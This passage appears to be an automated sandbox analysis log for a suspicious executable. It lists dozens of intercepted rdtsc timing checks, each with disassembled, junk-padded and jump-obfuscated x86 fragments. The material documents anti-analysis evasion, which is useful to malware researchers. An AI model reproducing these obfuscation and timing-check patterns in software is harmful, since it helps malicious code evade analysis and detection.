Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E3012C second address: 4E3016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0154ED0546h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F0154ED0540h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E3016B second address: 4E3016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E3016F second address: 4E30175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0B5F second address: 4DE0BFE instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F0154ECB885h 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f call 00007F0154ECB87Ch 0x00000014 pushfd 0x00000015 jmp 00007F0154ECB882h 0x0000001a and ecx, 6D98AC38h 0x00000020 jmp 00007F0154ECB87Bh 0x00000025 popfd 0x00000026 pop esi 0x00000027 pushfd 0x00000028 jmp 00007F0154ECB889h 0x0000002d adc si, DAD6h 0x00000032 jmp 00007F0154ECB881h 0x00000037 popfd 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b pushad 0x0000003c push eax 0x0000003d mov esi, edi 0x0000003f pop edi 0x00000040 push eax 0x00000041 push edx 0x00000042 call 00007F0154ECB882h 0x00000047 pop eax 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0BFE second address: 4DE0C14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0C14 second address: 4DE0C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0557 second address: 4DE055B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE055B second address: 4DE055F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE055F second address: 4DE0565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0565 second address: 4DE0582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0154ECB87Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0582 second address: 4DE0588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0588 second address: 4DE058C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE058C second address: 4DE063F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e mov bx, cx 0x00000011 pop ecx 0x00000012 pushfd 0x00000013 jmp 00007F0154ED0547h 0x00000018 sbb cl, 0000005Eh 0x0000001b jmp 00007F0154ED0549h 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushad 0x00000025 mov edx, 5020C56Ch 0x0000002a popad 0x0000002b pushfd 0x0000002c jmp 00007F0154ED0545h 0x00000031 sub cl, 00000046h 0x00000034 jmp 00007F0154ED0541h 0x00000039 popfd 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d pushad 0x0000003e mov ebx, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 pushfd 0x00000043 jmp 00007F0154ED0546h 0x00000048 sbb eax, 0A109118h 0x0000004e jmp 00007F0154ED053Bh 0x00000053 popfd 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE063F second address: 4DE0659 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0154ECB87Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0659 second address: 4DE065F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0311 second address: 4DE0315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0315 second address: 4DE0328 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0328 second address: 4DE032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE032E second address: 4DE0332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0332 second address: 4DE034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dx, cx 0x0000000d movzx esi, bx 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov ebx, 2040AFA4h 0x00000018 push eax 0x00000019 push edx 0x0000001a mov bh, AFh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE034E second address: 4DE0393 instructions: 0x00000000 rdtsc 0x00000002 mov si, 3D4Bh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F0154ED0543h 0x00000014 adc esi, 575ECC6Eh 0x0000001a jmp 00007F0154ED0549h 0x0000001f popfd 0x00000020 push ecx 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0393 second address: 4DE03AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ECB888h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE03AF second address: 4DE03B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE03B3 second address: 4DE0404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0154ECB888h 0x00000012 or eax, 28FE5578h 0x00000018 jmp 00007F0154ECB87Bh 0x0000001d popfd 0x0000001e call 00007F0154ECB888h 0x00000023 pop eax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0404 second address: 4DE040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE040A second address: 4DE040E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE040E second address: 4DE0412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF018A second address: 4DF01AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0154ECB884h 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF01AD second address: 4DF01B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF01B1 second address: 4DF01B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF01B7 second address: 4DF01C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ED053Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF01C6 second address: 4DF01CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF01CA second address: 4DF01F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0154ED053Eh 0x00000012 sub al, 00000068h 0x00000015 jmp 00007F0154ED053Bh 0x0000001a popfd 0x0000001b mov edi, eax 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF01F7 second address: 4DF01FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00134 second address: 4E001F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0154ED053Fh 0x00000008 pushfd 0x00000009 jmp 00007F0154ED0548h 0x0000000e adc al, 00000048h 0x00000011 jmp 00007F0154ED053Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F0154ED0549h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F0154ED053Eh 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 jmp 00007F0154ED053Eh 0x0000002e pushad 0x0000002f mov cx, C087h 0x00000033 pushfd 0x00000034 jmp 00007F0154ED053Ch 0x00000039 add esi, 29BC0238h 0x0000003f jmp 00007F0154ED053Bh 0x00000044 popfd 0x00000045 popad 0x00000046 popad 0x00000047 mov eax, dword ptr [ebp+08h] 0x0000004a jmp 00007F0154ED0546h 0x0000004f and dword ptr [eax], 00000000h 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E001F3 second address: 4E001F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E001F9 second address: 4E00249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 14h 0x00000005 pushfd 0x00000006 jmp 00007F0154ED0547h 0x0000000b or al, 0000000Eh 0x0000000e jmp 00007F0154ED0549h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 and dword ptr [eax+04h], 00000000h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0154ED053Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE04F6 second address: 4DE0505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0505 second address: 4DE050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE050B second address: 4DE050F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE050F second address: 4DE0527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0527 second address: 4DE052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE052B second address: 4DE052F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE052F second address: 4DE0535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0F06 second address: 4DF0F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0F0A second address: 4DF0F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0F10 second address: 4DF0F16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0F16 second address: 4DF0F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0F1A second address: 4DF0F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0F1E second address: 4DF0F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0F2C second address: 4DF0F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0F31 second address: 4DF0F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0F37 second address: 4DF0F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E207D8 second address: 4E207EB instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, BBFBh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e movsx ebx, ax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E207EB second address: 4E207FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop esi 0x0000000e mov si, dx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E207FD second address: 4E20818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ECB887h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20818 second address: 4E20871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [76FA65FCh] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, ebx 0x00000015 pushfd 0x00000016 jmp 00007F0154ED053Fh 0x0000001b sub si, C04Eh 0x00000020 jmp 00007F0154ED0549h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20871 second address: 4E208FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0154ECB87Ch 0x00000012 adc si, A7F8h 0x00000017 jmp 00007F0154ECB87Bh 0x0000001c popfd 0x0000001d push ecx 0x0000001e mov dx, 2A1Ah 0x00000022 pop edx 0x00000023 popad 0x00000024 je 00007F01C6FCE92Eh 0x0000002a jmp 00007F0154ECB87Eh 0x0000002f mov ecx, eax 0x00000031 jmp 00007F0154ECB880h 0x00000036 xor eax, dword ptr [ebp+08h] 0x00000039 jmp 00007F0154ECB881h 0x0000003e and ecx, 1Fh 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F0154ECB87Dh 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20A01 second address: 4E20A4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0154ED0544h 0x00000011 add ah, FFFFFFE8h 0x00000014 jmp 00007F0154ED053Bh 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0154ED0546h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20A4E second address: 4E20A63 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 154B43E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 push edx 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0021 second address: 4DD0027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0027 second address: 4DD00D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ch, 7Eh 0x0000000c mov bx, 54DAh 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F0154ECB881h 0x00000017 mov ebp, esp 0x00000019 jmp 00007F0154ECB87Eh 0x0000001e and esp, FFFFFFF8h 0x00000021 pushad 0x00000022 push esi 0x00000023 jmp 00007F0154ECB87Dh 0x00000028 pop eax 0x00000029 mov eax, ebx 0x0000002b popad 0x0000002c push edx 0x0000002d jmp 00007F0154ECB888h 0x00000032 mov dword ptr [esp], ecx 0x00000035 jmp 00007F0154ECB880h 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c movzx ecx, di 0x0000003f mov edx, 190D329Eh 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 call 00007F0154ECB882h 0x0000004c push esi 0x0000004d pop edi 0x0000004e pop ecx 0x0000004f mov cl, dl 0x00000051 popad 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F0154ECB885h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD00D9 second address: 4DD00F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD00F7 second address: 4DD00FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD00FB second address: 4DD0101 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0101 second address: 4DD01E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0154ECB886h 0x00000013 adc cl, FFFFFF88h 0x00000016 jmp 00007F0154ECB87Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F0154ECB888h 0x00000022 sbb ecx, 590CDAE8h 0x00000028 jmp 00007F0154ECB87Bh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007F0154ECB889h 0x00000035 xchg eax, esi 0x00000036 pushad 0x00000037 push esi 0x00000038 pushad 0x00000039 popad 0x0000003a pop ebx 0x0000003b pushfd 0x0000003c jmp 00007F0154ECB886h 0x00000041 sub ax, AFA8h 0x00000046 jmp 00007F0154ECB87Bh 0x0000004b popfd 0x0000004c popad 0x0000004d mov esi, dword ptr [ebp+08h] 0x00000050 jmp 00007F0154ECB886h 0x00000055 xchg eax, edi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 call 00007F0154ECB888h 0x0000005e pop eax 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD01E0 second address: 4DD0210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 jmp 00007F0154ED053Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 movsx ebx, ax 0x00000013 mov dx, ax 0x00000016 popad 0x00000017 xchg eax, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push edx 0x0000001c pop eax 0x0000001d jmp 00007F0154ED053Dh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0210 second address: 4DD0216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0216 second address: 4DD021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD021A second address: 4DD023F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F0154ECB87Fh 0x0000000f je 00007F01C7019C58h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD023F second address: 4DD025A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD025A second address: 4DD02EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0154ECB87Fh 0x00000009 or ax, BFCEh 0x0000000e jmp 00007F0154ECB889h 0x00000013 popfd 0x00000014 mov edi, esi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000020 pushad 0x00000021 jmp 00007F0154ECB888h 0x00000026 pushfd 0x00000027 jmp 00007F0154ECB882h 0x0000002c add al, FFFFFFA8h 0x0000002f jmp 00007F0154ECB87Bh 0x00000034 popfd 0x00000035 popad 0x00000036 je 00007F01C7019BCDh 0x0000003c pushad 0x0000003d mov esi, 7D129CBBh 0x00000042 mov dl, ah 0x00000044 popad 0x00000045 mov edx, dword ptr [esi+44h] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b push eax 0x0000004c pop edx 0x0000004d pushad 0x0000004e popad 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD02EE second address: 4DD02F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD02F4 second address: 4DD02F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD02F8 second address: 4DD0329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0154ED053Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0329 second address: 4DD0344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0154ECB87Bh 0x00000015 rdtsc
